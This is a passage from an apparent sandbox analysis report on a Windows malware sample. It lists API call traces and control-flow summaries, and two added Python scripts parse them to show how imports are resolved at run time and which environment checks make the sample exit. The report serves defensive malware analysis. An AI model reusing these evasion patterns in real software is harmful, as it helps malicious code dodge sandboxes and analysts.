HttpSendRequestA InternetReadFile 27230->27231 27232 30549c InternetCloseHandle 27231->27232 27236 3053f2 27231->27236 27233 3054ae 27232->27233 27233->27161 27234 3053fd lstrlen 27234->27236 27235 30542e lstrcpy lstrcat 27235->27236 27236->27232 27236->27234 27236->27235 27237 305473 27236->27237 27238 30546b lstrcpy 27236->27238 27239 30547a InternetReadFile 27237->27239 27238->27237 27239->27232 27239->27236 27241 318cc6 ExitProcess 27240->27241 27256 318ccd 27240->27256 27242 318ee2 27242->26131 27243 318d30 lstrlen 27243->27256 27244 318e56 StrCmpCA 27244->27256 27245 318d5a lstrlen 27245->27256 27246 318dbd StrCmpCA 
27246->27256 27247 318ddd StrCmpCA 27247->27256 27248 318dfd StrCmpCA 27248->27256 27249 318e1d StrCmpCA 27249->27256 27250 318e3d StrCmpCA 27250->27256 27251 318d84 StrCmpCA 27251->27256 27252 318da4 StrCmpCA 27252->27256 27253 318d06 lstrlen 27253->27256 27254 318e88 lstrlen 27254->27256 27255 318e6f StrCmpCA 27255->27256 27256->27242 27256->27243 27256->27244 27256->27245 27256->27246 27256->27247 27256->27248 27256->27249 27256->27250 27256->27251 27256->27252 27256->27253 27256->27254 27256->27255 27257 318ebb lstrcpy 27256->27257 27257->27256 27258->26137 27259->26139 27260->26145 27261->26147 27262->26153 27263->26155 27264->26161 27265->26165 27266->26171 27267->26173 27268->26177 27269->26191 27270->26195 27271->26194 27272->26190 27273->26194 27274->26212 27275->26197 27276->26198 27277->26202 27278->26208 27279->26209 27280->26215 27281->26223 27282->26225 27283->26248 27284->26252 27285->26251 27286->26247 27287->26251 27288->26261 27291 30161f 27290->27291 27292 30162b lstrcpy 27291->27292 27293 301633 27291->27293 27292->27293 27294 30164d lstrcpy 27293->27294 27295 301655 27293->27295 27294->27295 27296 30166f lstrcpy 27295->27296 27297 301677 27295->27297 27296->27297 27298 301699 27297->27298 27299 301691 lstrcpy 27297->27299 27298->26984 27299->27298 27301 3271e6 27300->27301 27302 322860 27301->27302 27303 3271fc lstrcpy 27301->27303 27302->26126 27303->27302 27305 304bd0 27304->27305 27305->27305 27306 304bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27305->27306 27307 304c41 27306->27307 27307->27091 27309 323e83 27308->27309 27310 323e9f lstrcpy 27309->27310 27311 323eab 27309->27311 27310->27311 27312 323ed5 GetSystemTime 27311->27312 27313 323ecd lstrcpy 27311->27313 27314 323ef3 27312->27314 27313->27312 27314->27110 27317 32732d 27315->27317 27316 30519b 27319 327280 27316->27319 27317->27316 27318 32733d lstrcpy lstrcat 27317->27318 27318->27316 27320 32728c 27319->27320 27321 3272b4 27320->27321 27322 3272ac lstrcpy 
27320->27322 27321->27166 27322->27321 27325 3272dc 27323->27325 27324 3051b7 27324->27169 27325->27324 27326 3272ed lstrcpy lstrcat 27325->27326 27326->27324 27358 3231f0 GetSystemInfo wsprintfA 27332 328471 121 API calls 2 library calls 27333 314c77 296 API calls 27348 31e0f9 140 API calls 27376 316b79 138 API calls 27335 308c79 strcpy_s 27367 31f2f8 93 API calls 27377 301b64 162 API calls 27386 30bbf9 90 API calls 27353 322d60 11 API calls 27378 322b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27364 311269 408 API calls 27336 305869 57 API calls 27337 322853 lstrcpy 27349 322cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27355 313959 244 API calls 27359 3101d9 126 API calls 27350 323cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27387 3233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27380 318615 49 API calls 27339 31e049 147 API calls 27388 318615 48 API calls
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00304C7F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304CD2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D05
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D35
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D73
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00304DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: c64507cd7c2f68ca940917f32581cbcff29bee4326041faf4c28326ea17e23de
                                  • Instruction ID: 697c3c5b77951d03ad933ab1541de5620eff7034776fa1ff37e5d41087b709a1
                                  • Opcode Fuzzy Hash: c64507cd7c2f68ca940917f32581cbcff29bee4326041faf4c28326ea17e23de
                                  • Instruction Fuzzy Hash: 20528F719126169BDB23EFA4DC99AAF77B9AF04300F054424F901AB291DF70ED46CBE0

                                  Control-flow Graph (blocks by address range with their calls; the text export does not preserve the executed / not-executed colouring of the graph image)
                                  • 326390-3263bd: GetPEB; continues to 3263c3-3265be (call 3262f0, GetProcAddress ×20) or straight to 3265c3-326623
                                  • 3265c3-326623: LoadLibraryA ×5; then 326625-326633 (GetProcAddress) or 326638-32663f
                                  • 326638-32663f: branch to 326641-326667 (GetProcAddress ×2) or 32666c-326673
                                  • 32666c-326673: branch to 326675-326683 (GetProcAddress) or 326688-32668f
                                  • 326688-32668f: branch to 326691-32669f (GetProcAddress) or 3266a4-3266ab
                                  • 3266a4-3266ab: branch to 3266ad-3266d2 (GetProcAddress ×2) or 3266d7-3266da (end of graph)
                                  Each GetProcAddress group after the LoadLibraryA block can be skipped by the branch in front of it, and the API list below shows a different module handle per group (75070000, 75FD0000, 75A50000, 74E50000, 76E80000). The first 20 resolutions use handle 75900000, which is in use before any LoadLibraryA call.
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01020558), ref: 003263E9
                                  • GetProcAddress.KERNEL32(75900000,01020810), ref: 00326402
                                  • GetProcAddress.KERNEL32(75900000,01020828), ref: 0032641A
                                  • GetProcAddress.KERNEL32(75900000,01020708), ref: 00326432
                                  • GetProcAddress.KERNEL32(75900000,01028B60), ref: 0032644B
                                  • GetProcAddress.KERNEL32(75900000,01016680), ref: 00326463
                                  • GetProcAddress.KERNEL32(75900000,010166E0), ref: 0032647B
                                  • GetProcAddress.KERNEL32(75900000,01020720), ref: 00326494
                                  • GetProcAddress.KERNEL32(75900000,01020750), ref: 003264AC
                                  • GetProcAddress.KERNEL32(75900000,010205A0), ref: 003264C4
                                  • GetProcAddress.KERNEL32(75900000,010207B0), ref: 003264DD
                                  • GetProcAddress.KERNEL32(75900000,01016980), ref: 003264F5
                                  • GetProcAddress.KERNEL32(75900000,010207C8), ref: 0032650D
                                  • GetProcAddress.KERNEL32(75900000,010205E8), ref: 00326526
                                  • GetProcAddress.KERNEL32(75900000,01016880), ref: 0032653E
                                  • GetProcAddress.KERNEL32(75900000,01020840), ref: 00326556
                                  • GetProcAddress.KERNEL32(75900000,01020570), ref: 0032656F
                                  • GetProcAddress.KERNEL32(75900000,010168A0), ref: 00326587
                                  • GetProcAddress.KERNEL32(75900000,01020618), ref: 0032659F
                                  • GetProcAddress.KERNEL32(75900000,010167E0), ref: 003265B8
                                  • LoadLibraryA.KERNEL32(01020588,?,?,?,00321C03), ref: 003265C9
                                  • LoadLibraryA.KERNEL32(01020600,?,?,?,00321C03), ref: 003265DB
                                  • LoadLibraryA.KERNEL32(010205B8,?,?,?,00321C03), ref: 003265ED
                                  • LoadLibraryA.KERNEL32(010205D0,?,?,?,00321C03), ref: 003265FE
                                  • LoadLibraryA.KERNEL32(01020630,?,?,?,00321C03), ref: 00326610
                                  • GetProcAddress.KERNEL32(75070000,01020648), ref: 0032662D
                                  • GetProcAddress.KERNEL32(75FD0000,01020678), ref: 00326649
                                  • GetProcAddress.KERNEL32(75FD0000,01028CB8), ref: 00326661
                                  • GetProcAddress.KERNEL32(75A50000,01028E80), ref: 0032667D
                                  • GetProcAddress.KERNEL32(74E50000,01016800), ref: 00326699
                                  • GetProcAddress.KERNEL32(76E80000,01028A60), ref: 003266B5
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 003266CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 003266C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: the same 16 dump regions (dump set 00000000.00000002, 0x300000 through 0x993000) as listed under the preceding function
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: bafddf9566a04b512aeb1c0e5f789bc930e4f329f52d34ff20d9fc10515ba606
                                  • Instruction ID: 249e89dd3f12e513be6a909c3df9eb3312a8ca8bbff09368a28ec6201e1bad0c
                                  • Opcode Fuzzy Hash: bafddf9566a04b512aeb1c0e5f789bc930e4f329f52d34ff20d9fc10515ba606
                                  • Instruction Fuzzy Hash: CFA16FF9A117009FD758DFA5EE8CA2677B9F7A87403008519F956C3360DBB4A908FB60
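Function 326390 builds its import table at run time: 20 GetProcAddress calls against handle 75900000 before any LoadLibraryA, then five LoadLibraryA calls and one or two resolutions against each returned handle, with only NtQueryInformationProcess passed as a readable name. The script below is an added example and is not part of the report or of the sample; it parses the report's API lines (assumed to be in exactly the text form printed above, bullet included) and summarises which handles are used, how many exports each yields, which handle was already in use before the first LoadLibraryA, and which export names the sandbox rendered as strings rather than pointers. The embedded trace is the 32 lines listed above for this function.

```python
"""Added example, not code from the Joe Sandbox report: parse the "APIs"
lines printed per function (Name.MODULE(args), ref: address) and summarise
how the function resolves its imports at run time. API_TRACE_326390 holds
the 32 lines the report prints for function 326390."""
import re
from collections import Counter

API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
POINTER = re.compile(r"[0-9A-Fa-f]{8}")   # an 8-hex-digit argument is a raw handle/pointer

API_TRACE_326390 = """
• GetProcAddress.KERNEL32(75900000,01020558), ref: 003263E9
• GetProcAddress.KERNEL32(75900000,01020810), ref: 00326402
• GetProcAddress.KERNEL32(75900000,01020828), ref: 0032641A
• GetProcAddress.KERNEL32(75900000,01020708), ref: 00326432
• GetProcAddress.KERNEL32(75900000,01028B60), ref: 0032644B
• GetProcAddress.KERNEL32(75900000,01016680), ref: 00326463
• GetProcAddress.KERNEL32(75900000,010166E0), ref: 0032647B
• GetProcAddress.KERNEL32(75900000,01020720), ref: 00326494
• GetProcAddress.KERNEL32(75900000,01020750), ref: 003264AC
• GetProcAddress.KERNEL32(75900000,010205A0), ref: 003264C4
• GetProcAddress.KERNEL32(75900000,010207B0), ref: 003264DD
• GetProcAddress.KERNEL32(75900000,01016980), ref: 003264F5
• GetProcAddress.KERNEL32(75900000,010207C8), ref: 0032650D
• GetProcAddress.KERNEL32(75900000,010205E8), ref: 00326526
• GetProcAddress.KERNEL32(75900000,01016880), ref: 0032653E
• GetProcAddress.KERNEL32(75900000,01020840), ref: 00326556
• GetProcAddress.KERNEL32(75900000,01020570), ref: 0032656F
• GetProcAddress.KERNEL32(75900000,010168A0), ref: 00326587
• GetProcAddress.KERNEL32(75900000,01020618), ref: 0032659F
• GetProcAddress.KERNEL32(75900000,010167E0), ref: 003265B8
• LoadLibraryA.KERNEL32(01020588,?,?,?,00321C03), ref: 003265C9
• LoadLibraryA.KERNEL32(01020600,?,?,?,00321C03), ref: 003265DB
• LoadLibraryA.KERNEL32(010205B8,?,?,?,00321C03), ref: 003265ED
• LoadLibraryA.KERNEL32(010205D0,?,?,?,00321C03), ref: 003265FE
• LoadLibraryA.KERNEL32(01020630,?,?,?,00321C03), ref: 00326610
• GetProcAddress.KERNEL32(75070000,01020648), ref: 0032662D
• GetProcAddress.KERNEL32(75FD0000,01020678), ref: 00326649
• GetProcAddress.KERNEL32(75FD0000,01028CB8), ref: 00326661
• GetProcAddress.KERNEL32(75A50000,01028E80), ref: 0032667D
• GetProcAddress.KERNEL32(74E50000,01016800), ref: 00326699
• GetProcAddress.KERNEL32(76E80000,01028A60), ref: 003266B5
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 003266CC
"""


def parse_api_lines(text):
    """One dict per recognised API line; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return calls


def import_resolution(calls):
    """Summarise run-time import resolution in code order (sorted by ref):
    per_handle        GetProcAddress calls per module handle (first argument)
    loadlibrary_calls number of LoadLibraryA calls
    preloaded         handles used before the first LoadLibraryA, so obtained
                      some other way (the CFG for 326390 shows a GetPEB block)
    plaintext_names   export names the sandbox printed as a string; the others
                      appear only as pointers"""
    calls = sorted(calls, key=lambda c: c["ref"])
    first_load = min((c["ref"] for c in calls if c["api"] == "LoadLibraryA"), default=None)
    per_handle, preloaded, plaintext = Counter(), set(), []
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        handle, name = c["args"][0], c["args"][1]
        per_handle[handle] += 1
        if first_load is None or c["ref"] < first_load:
            preloaded.add(handle)
        if not POINTER.fullmatch(name):
            plaintext.append(name)
    n_load = sum(c["api"] == "LoadLibraryA" for c in calls)
    return {"per_handle": per_handle, "loadlibrary_calls": n_load,
            "preloaded": preloaded, "plaintext_names": plaintext}


if __name__ == "__main__":
    summary = import_resolution(parse_api_lines(API_TRACE_326390))
    for handle, n in summary["per_handle"].most_common():
        tag = "in use before any LoadLibraryA" if handle in summary["preloaded"] else "LoadLibraryA handle"
        print(f"handle {handle}: {n} exports resolved ({tag})")
    print("LoadLibraryA calls:", summary["loadlibrary_calls"])
    print("export names visible as strings:", summary["plaintext_names"])
```

The same parser applies to the "Part of subcall function" lines in later entries; the `subcall` field records which inner function a line belongs to, so the VirtualAllocExNuma and GlobalMemoryStatusEx calls under 301030 and 3010c0 can be attributed without losing the caller.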

                                  Control-flow Graph (blocks by address range with their calls; the text export does not preserve the executed / not-executed colouring of the graph image)
                                  • 321bf0-321c0b: call 302a90, call 326390; then 321c1a-321c27, or first 321c0d and the self-looping block 321c10-321c18
                                  • 321c1a-321c27: call 302930; optionally 321c29-321c2f (lstrcpy); then 321c35-321c63
                                  • 321c35-321c63: branch to 321c65-321c67 (ExitProcess) or 321c6d-321c7b
                                  • 321c6d-321c7b: GetSystemInfo; branch to 321c7d-321c7f (ExitProcess) or 321c85-321ca0
                                  • 321c85-321ca0: call 301030, call 3010c0, GetUserDefaultLangID; then 321cb8-321cca directly or via 321ca2-321ca9
                                  • 321ca2-321ca9: branch to 321cb0-321cb2 (ExitProcess) or 321cb8-321cca
                                  • 321cb8-321cca: call 322ad0, call 323e10; then 321ce7-321d06 directly or via 321ccc-321cde
                                  • 321ccc-321cde: call 322a40, call 323e10; branch to 321ce0-321ce1 (ExitProcess) or 321ce7-321d06
                                  • 321ce7-321d06: lstrlen, call 302930; then 321d23-321d40 directly or via 321d08-321d0d, 321d0f-321d11 and 321d13-321d1d (lstrcpy, lstrcat)
                                  • 321d23-321d40: lstrlen, call 302930; then 321d5a-321d7b directly or via 321d42-321d44 and 321d46-321d54 (lstrcpy, lstrcat)
                                  • 321d5a-321d7b: call 322ad0, lstrlen, call 302930; then 321d9a-321db4 directly or via 321d7d-321d7f, 321d81-321d85 and 321d87-321d94 (lstrcpy, lstrcat)
                                  • 321d9a-321db4: lstrlen, call 302930; then 321dce-321deb directly or via 321db6-321db8 and 321dba-321dc8 (lstrcpy, lstrcat)
                                  • 321dce-321deb: call 322a40, lstrlen, call 302930; then 321e0a-321e0f directly or via 321ded-321def, 321df1-321df5 and 321df7-321e04 (lstrcpy, lstrcat)
                                  • 321e0a-321e0f: optionally 321e11 (call 302a20); then 321e16-321e22
                                  • 321e16-321e22: call 302930; then 321e30-321e66 directly or via 321e24-321e26 and 321e28-321e2a (lstrcpy)
                                  • 321e30-321e66: call 302a20 ×5, OpenEventA; branch to 321e68-321e8a or 321e8c-321ea0
                                  • 321e68-321e8a: CloseHandle, Sleep, OpenEventA; loops on itself, otherwise continues to 321e8c-321ea0
                                  • 321e8c-321ea0: CreateEventA, call 321b20, call 31ffd0; then 321ea5-321eae: CloseHandle, ExitProcess
                                  Four ExitProcess blocks precede the event handling and the calls into 321b20 and 31ffd0. They are reached from the block after call 302930, from the GetSystemInfo block, from the block after GetUserDefaultLangID (whose subcalls 301030 and 3010c0 wrap VirtualAllocExNuma and GlobalMemoryStatusEx, each with its own ExitProcess, per the subcall lines below) and from the block calling 322a40 (GetUserNameA, per its own entry below) and 323e10. Which branch is taken at each of these blocks depends on the result of the preceding call; the export records only the edges.
                                  APIs
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020558), ref: 003263E9
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020810), ref: 00326402
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020828), ref: 0032641A
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020708), ref: 00326432
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01028B60), ref: 0032644B
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01016680), ref: 00326463
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010166E0), ref: 0032647B
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020720), ref: 00326494
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01020750), ref: 003264AC
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010205A0), ref: 003264C4
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010207B0), ref: 003264DD
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,01016980), ref: 003264F5
                                    • Part of subcall function 00326390: GetProcAddress.KERNEL32(75900000,010207C8), ref: 0032650D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00321C2F
                                  • ExitProcess.KERNEL32 ref: 00321C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00321C71
                                  • ExitProcess.KERNEL32 ref: 00321C7F
                                    • Part of subcall function 00301030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                    • Part of subcall function 00301030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                    • Part of subcall function 00301030: ExitProcess.KERNEL32 ref: 00301058
                                    • Part of subcall function 003010C0: GlobalMemoryStatusEx.KERNEL32 ref: 003010EA
                                    • Part of subcall function 003010C0: ExitProcess.KERNEL32 ref: 00301114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00321C8F
                                  • ExitProcess.KERNEL32 ref: 00321CB2
                                  • ExitProcess.KERNEL32 ref: 00321CE1
                                  • lstrlen.KERNEL32(01028B10), ref: 00321CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321D15
                                  • lstrcat.KERNEL32(00000000,01028B10), ref: 00321D1D
                                  • lstrlen.KERNEL32(00334B98), ref: 00321D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321D48
                                  • lstrcat.KERNEL32(00000000,00334B98), ref: 00321D54
                                  • lstrlen.KERNEL32(00000000), ref: 00321D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321D94
                                  • lstrlen.KERNEL32(00334B98), ref: 00321D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321DBC
                                  • lstrcat.KERNEL32(00000000,00334B98), ref: 00321DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00321DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: the same 16 dump regions (dump set 00000000.00000002, 0x300000 through 0x993000) as listed under the preceding function
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 83f95d2c75fbd2b8b7dcdb838ef0b7d0ff85831825617323d94f622f79e90ad2
                                  • Instruction ID: a44886143b398b2d5a76466eb609b3bc6d28c313c108c795a5c9b5741b36c55b
                                  • Opcode Fuzzy Hash: 83f95d2c75fbd2b8b7dcdb838ef0b7d0ff85831825617323d94f622f79e90ad2
                                  • Instruction Fuzzy Hash: 0471B371501326EBD727ABB4ED8DB7F7A79AF60701F050024F906AA2A1DF74D809DB60
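The graph export for the entry function 321bf0 is the record of the sample's environment gates: four ExitProcess blocks are reachable before the event handling and the calls into 321b20 and 31ffd0. The script below is an added example and is not code from the report or from the sample. It parses the flattened control_flow_graph text in the token form Joe Sandbox prints (decimal block id, hex address range, `call X` and API labels, `N * count` repeat markers, and `a->b` edges) and lists, for every ExitProcess block, the nearest labelled predecessor blocks, plus any self-looping blocks. The embedded graph is this function's export copied from the report; the tokenisation rules (an address range has at least five hex digits, a digit-only token after `call` is an address, not a block id) are assumptions that hold for this report's output.

```python
"""Added example, not code from the Joe Sandbox report: parse the flattened
control_flow_graph export printed under each function and recover what an
analyst wants from it, the blocks that call ExitProcess, the nearest labelled
blocks in front of them (the environment gates) and any self-looping blocks.
CFG_321BF0 is the export for the entry function 321bf0 of this report."""
import re
from collections import defaultdict

ADDR = re.compile(r"[0-9a-f]{5,}(?:-[0-9a-f]{5,})?")   # block ranges, never "* N" counts
EDGE = re.compile(r"(\d+)->(\d+)")

CFG_321BF0 = """control_flow_graph 2141 321bf0-321c0b call 302a90 call 326390 2146 321c1a-321c27
call 302930 2141->2146 2147 321c0d 2141->2147 2151 321c35-321c63 2146->2151 2152 321c29-321c2f
lstrcpy 2146->2152 2148 321c10-321c18 2147->2148 2148->2146 2148->2148 2156 321c65-321c67
ExitProcess 2151->2156 2157 321c6d-321c7b GetSystemInfo 2151->2157 2152->2151 2158 321c85-321ca0
call 301030 call 3010c0 GetUserDefaultLangID 2157->2158 2159 321c7d-321c7f ExitProcess 2157->2159
2164 321ca2-321ca9 2158->2164 2165 321cb8-321cca call 322ad0 call 323e10 2158->2165 2164->2165
2166 321cb0-321cb2 ExitProcess 2164->2166 2171 321ce7-321d06 lstrlen call 302930 2165->2171
2172 321ccc-321cde call 322a40 call 323e10 2165->2172 2177 321d23-321d40 lstrlen call 302930
2171->2177 2178 321d08-321d0d 2171->2178 2172->2171 2185 321ce0-321ce1 ExitProcess 2172->2185
2186 321d42-321d44 2177->2186 2187 321d5a-321d7b call 322ad0 lstrlen call 302930 2177->2187
2178->2177 2180 321d0f-321d11 2178->2180 2180->2177 2183 321d13-321d1d lstrcpy lstrcat 2180->2183
2183->2177 2186->2187 2188 321d46-321d54 lstrcpy lstrcat 2186->2188 2193 321d9a-321db4 lstrlen
call 302930 2187->2193 2194 321d7d-321d7f 2187->2194 2188->2187 2199 321db6-321db8 2193->2199
2200 321dce-321deb call 322a40 lstrlen call 302930 2193->2200 2194->2193 2196 321d81-321d85
2194->2196 2196->2193 2197 321d87-321d94 lstrcpy lstrcat 2196->2197 2197->2193 2199->2200
2201 321dba-321dc8 lstrcpy lstrcat 2199->2201 2206 321e0a-321e0f 2200->2206 2207 321ded-321def
2200->2207 2201->2200 2209 321e11 call 302a20 2206->2209 2210 321e16-321e22 call 302930
2206->2210 2207->2206 2208 321df1-321df5 2207->2208 2208->2206 2213 321df7-321e04 lstrcpy lstrcat
2208->2213 2209->2210 2215 321e30-321e66 call 302a20 * 5 OpenEventA 2210->2215 2216 321e24-321e26
2210->2216 2213->2206 2228 321e68-321e8a CloseHandle Sleep OpenEventA 2215->2228 2229 321e8c-321ea0
CreateEventA call 321b20 call 31ffd0 2215->2229 2216->2215 2217 321e28-321e2a lstrcpy 2216->2217
2217->2215 2228->2228 2228->2229 2233 321ea5-321eae CloseHandle ExitProcess 2229->2233"""


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> {"range", "label"}, where
    label is the token list ("call X" = internal call, bare names = APIs)."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.fullmatch(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        prev = toks[i - 1] if i else ""
        # A block starts with a decimal id followed by its address range; the
        # operand of "call" is hex but may happen to be all digits (302930).
        if tok.isdigit() and prev != "call" and ADDR.fullmatch(nxt):
            cur = int(tok)
            nodes[cur] = {"range": nxt, "label": []}
            i += 2
            continue
        if cur is not None:
            nodes[cur]["label"].append(tok)
        i += 1
    return nodes, edges


def label_items(label):
    """Expand a label into (kind, name, count): ("call", addr, n) for internal
    calls, ("api", name, n) for imports; "NAME * N" means N invocations."""
    items, i = [], 0
    while i < len(label):
        if label[i] == "call" and i + 1 < len(label):
            items.append(["call", label[i + 1], 1]); i += 2
        elif label[i] == "*" and i + 1 < len(label) and items:
            items[-1][2] = int(label[i + 1]); i += 2
        else:
            items.append(["api", label[i], 1]); i += 1
    return [tuple(it) for it in items]


def exit_gates(nodes, edges):
    """Map each ExitProcess block to the nearest labelled predecessor blocks,
    walking back through unlabelled glue blocks (compare-and-jump only)."""
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    gates = {}
    for nid, node in nodes.items():
        if "ExitProcess" not in node["label"]:
            continue
        found, seen, todo = set(), set(), list(preds[nid])
        while todo:
            p = todo.pop()
            if p in seen:
                continue
            seen.add(p)
            if nodes[p]["label"]:
                found.add(p)
            else:
                todo.extend(preds[p])
        gates[nid] = found
    return gates


def self_loops(edges):
    """Blocks with an edge back to themselves (tight loops such as a wait)."""
    return {src for src, dst in edges if src == dst}


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_321BF0)
    print("self-looping blocks:", [nodes[n]["range"] for n in sorted(self_loops(edges))])
    for exit_id, gate_ids in exit_gates(nodes, edges).items():
        gates = ", ".join(f'{nodes[g]["range"]} [{" ".join(nodes[g]["label"])}]' for g in sorted(gate_ids))
        print(f"ExitProcess at {nodes[exit_id]['range']} gated by {gates}")
```

Run against this graph it reports the GetSystemInfo block, the block after GetUserDefaultLangID, the block calling 322a40 and 323e10, and the block after call 302930 as the gates, and the decryption-style loop at 321c10-321c18 and the Sleep/OpenEventA loop at 321e68-321e8a as the self-loops; the same parser can be pointed at the other control_flow_graph exports on this page.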

                                  Control-flow Graph (blocks by address range with their calls; the text export does not preserve the executed / not-executed colouring of the graph image)
                                  • 304a60-304afc: RtlAllocateHeap; continues to 304b7a-304bbe (VirtualProtect) either directly or through 304afe-304b03 and 304b06-304b78
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00304AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00304BB0
                                  Memory Dump Source
